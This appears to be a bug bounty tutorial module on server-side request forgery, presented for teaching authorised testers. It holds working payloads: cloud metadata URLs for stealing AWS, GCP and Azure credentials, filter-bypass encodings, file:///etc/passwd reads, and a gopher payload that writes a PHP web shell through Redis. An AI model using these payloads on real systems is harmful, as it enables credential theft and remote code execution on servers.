Web Vulnerability Classes
Server-Side Request Forgery (SSRF)
3 min read
SSRF tricks servers into making requests to unintended locations. It's a high-impact vulnerability that can lead to internal network access, cloud metadata theft, and RCE.
How SSRF Works
User Input: https://attacker.com/image.jpg
↓
Application fetches URL
↓
Instead: http://169.254.169.254/meta-data/
↓
Server returns internal data to attacker
Common SSRF Entry Points
| Feature | Parameter Example |
|---|---|
| URL preview | url=, link= |
| PDF generation | document_url= |
| Image fetch | image_url=, avatar= |
| Webhooks | callback_url= |
| File imports | import_url= |
| API integrations | endpoint= |
Basic SSRF Testing
# Step 1: Identify URL parameters
GET /fetch?url=https://example.com
# Step 2: Test with your callback
GET /fetch?url=https://your-server.com/ssrf-test
# Step 3: Check if server makes request
# Monitor your server logs for incoming connection
# Step 4: Target internal resources
GET /fetch?url=http://127.0.0.1:80
GET /fetch?url=http://localhost/admin
GET /fetch?url=http://192.168.1.1/
Cloud Metadata Exploitation
AWS
# Instance metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Get IAM role credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# User data (may contain secrets)
http://169.254.169.254/latest/user-data/
GCP
# Requires header: Metadata-Flavor: Google
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Azure
# Requires header: Metadata: true
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
Bypass Techniques
IP Address Obfuscation
# Decimal notation
http://2130706433/ # = 127.0.0.1
# Hex notation
http://0x7f000001/
# Octal notation
http://0177.0.0.1/
# IPv6
http://[::1]/
http://[0:0:0:0:0:0:0:1]/
# URL encoding
http://127.0.0.1%00@attacker.com/
DNS Rebinding
# Setup DNS to resolve to internal IP
# First resolution: Attacker IP (passes validation)
# Second resolution: 127.0.0.1 (actual request)
# Services like rebind.it, nip.io
http://127.0.0.1.nip.io/
Protocol Smuggling
# Different protocols
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aINFO%0d%0a # Redis
dict://127.0.0.1:11211/stats # Memcached
file:///etc/passwd # Local file read
Blind SSRF
When you can't see the response:
# Time-based detection
# Target a slow endpoint, measure response time
# Out-of-band detection
# Use Burp Collaborator or similar
url=http://<collaborator-id>.burpcollaborator.net/
# Target internal services that cause side effects
# E.g., send email, create file, modify database
SSRF to RCE
Redis (Port 6379)
# Using gopher protocol
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$34%0d%0a%0a%0a<?php system($_GET['c']); ?>%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$13%0d%0a/var/www/html%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$9%0d%0ashell.php%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
Internal Services
# Solr admin
http://127.0.0.1:8983/solr/admin/
# Jenkins
http://127.0.0.1:8080/script
# Elasticsearch
http://127.0.0.1:9200/_cluster/health
Impact Demonstration
For bug reports, demonstrate concrete impact:
## SSRF Impact Demonstration
### AWS Metadata Access
- Retrieved IAM credentials for role: webapp-prod
- Credentials allow S3 bucket listing
- 47 buckets accessible including customer-data-backup
### Internal Network Access
- Port scan revealed 3 internal web servers
- Jenkins (8080) accessible without authentication
- Redis (6379) allows unauthenticated access
Real-World Bounties
| Company | Impact | Bounty |
|---|---|---|
| Shopify | AWS metadata access | $25,000 |
| GitLab | Internal network scan | $10,000 |
| Uber | Internal service access | $12,500 |
| Cloud metadata | $15,000 |
Testing Tips
- Check every URL parameter: Even indirect ones
- Test protocol handling: file://, gopher://, dict://
- Try bypass techniques: When basic payloads fail
- Map internal network: Once SSRF confirmed, enumerate
- Chain with other bugs: SSRF + weak internal service = critical
Pro Tip: Cloud metadata is the holy grail of SSRF. Always test 169.254.169.254 first—leaked credentials often mean critical severity.
Next module: We'll explore advanced exploitation techniques. :::